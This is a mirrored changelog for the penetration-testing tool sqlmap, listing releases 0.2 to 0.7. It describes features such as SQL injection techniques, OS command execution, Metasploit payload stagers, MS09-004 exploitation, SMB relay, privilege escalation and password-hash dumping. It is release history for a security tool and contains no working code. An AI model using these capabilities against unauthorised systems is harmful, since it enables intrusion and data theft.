mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-24 08:14:24 +03:00
400 lines
20 KiB
Plaintext
400 lines
20 KiB
Plaintext
sqlmap (0.7-1) stable; urgency=low
|
|
|
|
* Adapted Metasploit wrapping functions to work with latest 3.3
|
|
development version too.
|
|
* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
|
|
* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
|
|
--os-bof is selected) when running under Windows because msfconsole
|
|
and msfcli are not supported on the native Windows Ruby interpreter.
|
|
This make sqlmap 0.7 to work again on Windows too.
|
|
* Minor improvement so that sqlmap tests also all parameters with no
|
|
value (eg. par=).
|
|
* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and
|
|
2.6+.
|
|
* Major bug fix to sql-query/sql-shell features.
|
|
* Major bug fix in --read-file option.
|
|
* Major silent bug fix to multi-threading functionality.
|
|
* Fixed the web backdoor functionality (for MySQL) when (usually) stacked
|
|
queries are not supported and --os-shell is provided.
|
|
* Fixed MySQL 'comment injection' version fingerprint.
|
|
* Fixed basic Microsoft SQL Server 2000 fingerprint.
|
|
* Many minor bug fixes and code refactoring.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Sat, 25 Jul 2009 10:00:00 +0000
|
|
|
|
sqlmap (0.7rc1-1) stable; urgency=low
|
|
|
|
* Added support to execute arbitrary commands on the database server
|
|
underlying operating system either returning the standard output or not
|
|
via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored
|
|
procedure on Microsoft SQL Server;
|
|
* Added support for out-of-band connection between the attacker box and
|
|
the database server underlying operating system via stand-alone payload
|
|
stager created by Metasploit and supporting Meterpreter, shell and VNC
|
|
payloads for both Windows and Linux;
|
|
* Added support for out-of-band connection via Microsoft SQL Server 2000
|
|
and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer
|
|
overflow (MS09-004) exploitation with multi-stage Metasploit payload
|
|
support;
|
|
* Added support for out-of-band connection via SMB reflection attack with
|
|
UNC path request from the database server to the attacker box by using
|
|
the Metasploit smb_relay exploit;
|
|
* Added support to read and write (upload) both text and binary files on
|
|
the database server underlying file system for MySQL, PostgreSQL and
|
|
Microsoft SQL Server;
|
|
* Added database process' user privilege escalation via Windows Access
|
|
Tokens kidnapping on MySQL and Microsoft SQL Server via either
|
|
Meterpreter's incognito extension or Churrasco stand-alone executable;
|
|
* Speed up the inference algorithm by providing the minimum required
|
|
charset for the query output;
|
|
* Major bug fix in the comparison algorithm to correctly handle also the
|
|
case that the url is stable and the False response changes the page
|
|
content very little;
|
|
* Many minor bug fixes, minor enhancements and layout adjustments.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Wed, 22 Apr 2009 10:30:00 +0000
|
|
|
|
sqlmap (0.6.4-1) stable; urgency=low
|
|
|
|
* Major enhancement to make the comparison algorithm work properly also
|
|
on url not stables automatically by using the difflib Sequence Matcher
|
|
object;
|
|
* Major enhancement to support SQL data definition statements, SQL data
|
|
manipulation statements, etc from user in SQL query and SQL shell if
|
|
stacked queries are supported by the web application technology;
|
|
* Major speed increase in DBMS basic fingerprint;
|
|
* Minor enhancement to support an option (--is-dba) to show if the
|
|
current user is a database management system administrator;
|
|
* Minor enhancement to support an option (--union-tech) to specify the
|
|
technique to use to detect the number of columns used in the web
|
|
application SELECT statement: NULL bruteforcing (default) or ORDER BY
|
|
clause bruteforcing;
|
|
* Added internal support to forge CASE statements, used only by --is-dba
|
|
query at the moment;
|
|
* Minor layout adjustment to the --update output;
|
|
* Increased default timeout to 30 seconds;
|
|
* Major bug fix to correctly handle custom SQL "limited" queries on
|
|
Microsoft SQL Server and Oracle;
|
|
* Major bug fix to avoid tracebacks when multiple targets are specified
|
|
and one of them is not reachable;
|
|
* Minor bug fix to make the Partial UNION query SQL injection technique
|
|
work properly also on Oracle and Microsoft SQL Server;
|
|
* Minor bug fix to make the --postfix work even if --prefix is not
|
|
provided;
|
|
* Updated documentation.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Tue, 3 Feb 2009 23:30:00 +0000
|
|
|
|
sqlmap (0.6.3-1) stable; urgency=low
|
|
|
|
* Major enhancement to get list of targets to test from Burp proxy
|
|
(http://portswigger.net/suite/) requests log file path or WebScarab
|
|
proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
|
|
'conversations/' folder path by providing option -l <filepath>;
|
|
* Major enhancement to support Partial UNION query SQL injection
|
|
technique too;
|
|
* Major enhancement to test if the web application technology supports
|
|
stacked queries (multiple statements) by providing option
|
|
--stacked-test which will be then used someday also by takeover
|
|
functionality;
|
|
* Major enhancement to test if the injectable parameter is affected by
|
|
a time based blind SQL injection technique by providing option
|
|
--time-test;
|
|
* Minor enhancement to fingerprint the web server operating system and
|
|
the web application technology by parsing some HTTP response headers;
|
|
* Minor enhancement to fingerprint the back-end DBMS operating system by
|
|
parsing the DBMS banner value when -b option is provided;
|
|
* Minor enhancement to be able to specify the number of seconds before
|
|
timeout the connection by providing option --timeout #, default is set
|
|
to 10 seconds and must be 3 or higher;
|
|
* Minor enhancement to be able to specify the number of seconds to wait
|
|
between each HTTP request by providing option --delay #;
|
|
* Minor enhancement to be able to get the injection payload --prefix and
|
|
--postfix from user;
|
|
* Minor enhancement to be able to enumerate table columns and dump table
|
|
entries, also when the database name is not provided, by using the
|
|
current database on MySQL and Microsoft SQL Server, the 'public'
|
|
scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
|
|
* Minor enhancemet to support also --regexp, --excl-str and --excl-reg
|
|
options rather than only --string when comparing HTTP responses page
|
|
content;
|
|
* Minor enhancement to be able to specify extra HTTP headers by providing
|
|
option --headers. By default Accept, Accept-Language and Accept-Charset
|
|
headers are set;
|
|
* Minor improvement to be able to provide CU (as current user) as user
|
|
value (-U) when enumerating users privileges or users passwords;
|
|
* Minor improvements to sqlmap Debian package files;
|
|
* Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
|
|
library if available to speed up the sqlmap algorithmic operations;
|
|
* Minor improvement to retry the HTTP request up to three times in case
|
|
an exception is raised during the connection to the target url;
|
|
* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
|
|
* Major bug fix so that when the user provide a SELECT statement to be
|
|
processed with an asterisk as columns, now it also work if in the FROM
|
|
there is no database name specified;
|
|
* Minor bug fix to correctly dump table entries when the column is
|
|
provided;
|
|
* Minor bug fix to correctly handle session.error, session.timeout and
|
|
httplib.BadStatusLine exceptions in HTTP requests;
|
|
* Minor bug fix to correctly catch connection exceptions and notify to
|
|
the user also if they occur within a thread;
|
|
* Increased default output level from 0 to 1;
|
|
* Updated documentation.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Thu, 18 Dec 2008 10:00:00 +0000
|
|
|
|
sqlmap (0.6.2-1) stable; urgency=low
|
|
|
|
* Major bug fix to correctly dump tables entries when --stop is not
|
|
specified;
|
|
* Major bug fix so that the users' privileges enumeration now works
|
|
properly also on both MySQL < 5.0 and MySQL >= 5.0;
|
|
* Major bug fix when the request is POST to also send the GET parameters
|
|
if any have been provided;
|
|
* Major bug fix to correctly update sqlmap to the latest stable release
|
|
with command line --update;
|
|
* Major bug fix so that when the expected value of a query (count
|
|
variable) is an integer and, for some reasons, its resumed value from
|
|
the session file is a string or a binary file, the query is executed
|
|
again and its new output saved to the session file;
|
|
* Minor bug fix in MySQL comment injection fingerprint technique;
|
|
* Minor improvement to correctly enumerate tables, columns and dump
|
|
tables entries on Oracle and on PostgreSQL when the database name is
|
|
not 'public' schema or a system database;
|
|
* Minor improvement to be able to dump entries on MySQL < 5.0 when
|
|
database name, table name and column(s) are provided;
|
|
* Updated the database management system fingerprint checks to correctly
|
|
identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
|
|
* More user-friendly warning messages.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Sun, 2 Nov 2008 19:00:00 +0000
|
|
|
|
sqlmap (0.6.1-1) stable; urgency=low
|
|
|
|
* Major bug fix to blind SQL injection bisection algorithm to handle an
|
|
exception;
|
|
* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
|
|
* Implemented possibility to test for and inject also on LIKE
|
|
statements;
|
|
* Implemented --start and --stop options to set the first and the last
|
|
table entry to dump;
|
|
* Added non-interactive/batch-mode (--batch) option to make it easy to
|
|
wrap sqlmap in Metasploit and any other tool;
|
|
* Minor enhancement to save also the length of query output in the
|
|
session file when retrieving the query output length for ETA or for
|
|
resume purposes;
|
|
* Changed the order sqlmap dump table entries from column by column to
|
|
row by row. Now it also dumps entries as they are stored in the tables,
|
|
not forcing the entries' order alphabetically anymore;
|
|
* Minor bug fix to correctly handle parameters' value with % character.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Fri, 20 Oct 2008 10:00:00 +0000
|
|
|
|
sqlmap (0.6-1) stable; urgency=low
|
|
|
|
* Complete code refactor and many bugs fixed;
|
|
* Added multithreading support to set the maximum number of concurrent
|
|
HTTP requests;
|
|
* Implemented SQL shell (--sql-shell) functionality and fixed SQL query
|
|
(--sql-query, before called -e) to be able to run whatever SELECT
|
|
statement and get its output in both inband and blind SQL injection
|
|
attack;
|
|
* Added an option (--privileges) to retrieve DBMS users privileges, it
|
|
also notifies if the user is a DBMS administrator;
|
|
* Added support (-c) to read options from configuration file, an example
|
|
of valid INI file is sqlmap.conf and support (--save) to save command
|
|
line options on a configuration file;
|
|
* Created a function that updates the whole sqlmap to the latest stable
|
|
version available by running sqlmap with --update option;
|
|
* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.)
|
|
installation binary packages;
|
|
* Created sqlmap .exe (Windows) portable executable;
|
|
* Save a lot of more information to the session file, useful when
|
|
resuming injection on the same target to not loose time on identifying
|
|
injection, UNION fields and back-end DBMS twice or more times;
|
|
* Improved automatic check for parenthesis when testing and forging SQL
|
|
query vector;
|
|
* Now it checks for SQL injection on all GET/POST/Cookie parameters then
|
|
it lets the user select which parameter to perform the injection on in
|
|
case that more than one is injectable;
|
|
* Implemented support for HTTPS requests over HTTP(S) proxy;
|
|
* Added a check to handle NULL or not available queries output;
|
|
* More entropy (randomStr() and randomInt() functions in
|
|
lib/core/common.py) in inband SQL injection concatenated query and in
|
|
AND condition checks;
|
|
* Improved XML files structure;
|
|
* Implemented the possibility to change the HTTP Referer header;
|
|
* Added support to resume from session file also when running with
|
|
inband SQL injection attack;
|
|
* Added an option (--os-shell) to execute operating system commands if
|
|
the back-end DBMS is MySQL, the web server has the PHP engine active
|
|
and permits write access on a directory within the document root;
|
|
* Added a check to assure that the provided string to match (--string)
|
|
is within the page content;
|
|
* Fixed various queries in XML file;
|
|
* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted
|
|
the library to parse it;
|
|
* Fixed password fetching function, mainly for Microsoft SQL Server and
|
|
reviewed the password hashes parsing function;
|
|
* Major bug fixed to avoid tracebacks when the testable parameter(s) is
|
|
dynamic, but not injectable;
|
|
* Enhanced logging system: added three more levels of verbosity to show
|
|
also HTTP sent and received traffic;
|
|
* Enhancement to handle Set-Cookie from target url and automatically
|
|
re-establish the Session when it expires;
|
|
* Added support to inject also on Set-Cookie parameters;
|
|
* Implemented TAB completion and command history on both --sql-shell and
|
|
--os-shell;
|
|
* Renamed some command line options;
|
|
* Added a conversion library;
|
|
* Added code schema and reminders for future developments;
|
|
* Added Copyright comment and $Id$;
|
|
* Updated the command line layout and help messages;
|
|
* Updated some docstrings;
|
|
* Updated documentation files.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Mon, 1 Sep 2008 10:00:00 +0100
|
|
|
|
sqlmap (0.5-1) stable; urgency=low
|
|
|
|
* Added support for Oracle database management system
|
|
* Extended inband SQL injection functionality (--union-use) to all
|
|
other possible queries since it only worked with -e and --file on
|
|
all DMBS plugins;
|
|
* Added support to extract database users password hash on Microsoft
|
|
SQL Server;
|
|
* Added a fuzzer function with the aim to parse HTML page looking
|
|
for standard database error messages consequently improving
|
|
database fingerprinting;
|
|
* Added support for SQL injection on HTTP Cookie and User-Agent headers;
|
|
* Reviewed HTTP request library (lib/request.py) to support the
|
|
extended inband SQL injection functionality. Splitted getValue()
|
|
into getInband() and getBlind();
|
|
* Major enhancements in common library and added checkForBrackets()
|
|
method to check if the bracket(s) are needed to perform a UNION query
|
|
SQL injection attack;
|
|
* Implemented --dump-all functionality to dump entire DBMS data from
|
|
all databases tables;
|
|
* Added support to exclude DBMS system databases' when enumeration
|
|
tables and dumping their entries (--exclude-sysdbs);
|
|
* Implemented in Dump.dbTableValues() method the CSV file dumped data
|
|
automatic saving in csv/ folder by default;
|
|
* Added DB2, Informix and Sybase DBMS error messages and minor
|
|
improvements in xml/errors.xml;
|
|
* Major improvement in all three DBMS plugins so now sqlmap does not
|
|
get entire databases' tables structure when all of database/table/
|
|
column are specified to be dumped;
|
|
* Important fixes in lib/option.py to make sqlmap properly work also
|
|
with python 2.5 and handle the CSV dump files creation work also
|
|
under Windows operating system, function __setCSVDir() and fixed
|
|
also in lib/dump.py;
|
|
* Minor enhancement in lib/injection.py to randomize the number
|
|
requested to test the presence of a SQL injection affected parameter
|
|
and implemented the possibilities to break (q) the for cycle when
|
|
using the google dork option (-g);
|
|
* Minor fix in lib/request.py to properly encode the url to request
|
|
in case the "fixed" part of the url has blank spaces;
|
|
* More minor layout enhancements in some libraries;
|
|
* Renamed DMBS plugins;
|
|
* Complete code refactoring, a lot of minor and some major fixes in
|
|
libraries, many minor improvements;
|
|
* Updated all documentation files.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Sun, 4 Nov 2007 20:00:00 +0100
|
|
|
|
sqlmap (0.4-1) stable; urgency=low
|
|
|
|
* Added DBMS fingerprint based also upon HTML error messages parsing
|
|
defined in lib/parser.py which reads an XML file defining default
|
|
error messages for each supported DBMS;
|
|
* Added Microsoft SQL Server extensive DBMS fingerprint checks based
|
|
upon accurate '@@version' parsing matching on an XML file to get also
|
|
the exact patching level of the DBMS;
|
|
* Added support for query ETA (Estimated Time of Arrival) real time
|
|
calculation (--eta);
|
|
* Added support to extract database management system users password
|
|
hash on MySQL and PostgreSQL (--passwords);
|
|
* Added docstrings to all functions, classes and methods, consequently
|
|
released the sqlmap development documentation
|
|
<http://sqlmap.sourceforge.net/dev/>;
|
|
* Implemented Google dorking feature (-g) to take advantage of Google
|
|
results affected by SQL injection to perform other command line
|
|
argument on their DBMS;
|
|
* Improved logging functionality: passed from banal 'print' to Python
|
|
native logging library;
|
|
* Added support for more than one parameter in '-p' command line
|
|
option;
|
|
* Added support for HTTP Basic and Digest authentication methods
|
|
(--basic-auth and --digest-auth);
|
|
* Added the command line option '--remote-dbms' to manually specify
|
|
the remote DBMS;
|
|
* Major improvements in union.UnionCheck() and union.UnionUse()
|
|
functions to make it possible to exploit inband SQL injection also
|
|
with database comment characters ('--' and '#') in UNION query
|
|
statements;
|
|
* Added the possibility to save the output into a file while performing
|
|
the queries (-o OUTPUTFILE) so it is possible to stop and resume the
|
|
same query output retrieving in a second time (--resume);
|
|
* Added support to specify the database table column to enumerate
|
|
(-C COL);
|
|
* Added inband SQL injection (UNION query) support (--union-use);
|
|
* Complete code refactoring, a lot of minor and some major fixes in
|
|
libraries, many minor improvements;
|
|
* Reviewed the directory tree structure;
|
|
* Splitted lib/common.py: inband injection functionalities now are
|
|
moved to lib/union.py;
|
|
* Updated documentation files.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Fri, 15 Jun 2007 20:00:00 +0100
|
|
|
|
sqlmap (0.3-1) stable; urgency=low
|
|
|
|
* Added module for MS SQL Server;
|
|
* Strongly improved MySQL dbms active fingerprint and added MySQL
|
|
comment injection check;
|
|
* Added PostgreSQL dbms active fingerprint;
|
|
* Added support for string match (--string);
|
|
* Added support for UNION check (--union-check);
|
|
* Removed duplicated code, delegated most of features to the engine
|
|
in common.py and option.py;
|
|
* Added support for --data command line argument to pass the string
|
|
for POST requests;
|
|
* Added encodeParams() method to encode url parameters before making
|
|
http request;
|
|
* Many bug fixes;
|
|
* Rewritten documentation files;
|
|
* Complete code restyling.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Sat, 20 Jan 2007 20:00:00 +0100
|
|
|
|
sqlmap (0.2-1) stable; urgency=low
|
|
|
|
* complete refactor of entire program;
|
|
* added TODO and THANKS files;
|
|
* added some papers references in README file;
|
|
* moved headers to user-agents.txt, now -f parameter specifies a file
|
|
(user-agents.txt) and randomize the selection of User-Agent header;
|
|
* strongly improved program plugins (mysqlmap.py and postgres.py),
|
|
major enhancements:
|
|
* improved active mysql fingerprint check_dbms();
|
|
* improved enumeration functions for both databases;
|
|
* minor changes in the unescape() functions;
|
|
* replaced old inference algorithm with a new bisection algorithm.
|
|
* reviewed command line parameters, now with -p it's possible to
|
|
specify the parameter you know it's vulnerable to sql injection,
|
|
this way the script won't perform the sql injection checks itself;
|
|
removed the TOKEN parameter;
|
|
* improved Common class, adding support for http proxy and http post
|
|
method in hash_page;
|
|
* added OptionCheck class in option.py which performs all needed checks
|
|
on command line parameters and values;
|
|
* added InjectionCheck class in injection.py which performs check on
|
|
url stability, dynamics of parameters and injection on dynamic url
|
|
parameters;
|
|
* improved output methods in dump.py;
|
|
* layout enhancement on main program file (sqlmap.py), adapted to call
|
|
new option/injection classes and improvements on catching of
|
|
exceptions.
|
|
|
|
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Wed, 13 Dec 2006 20:00:00 +0100
|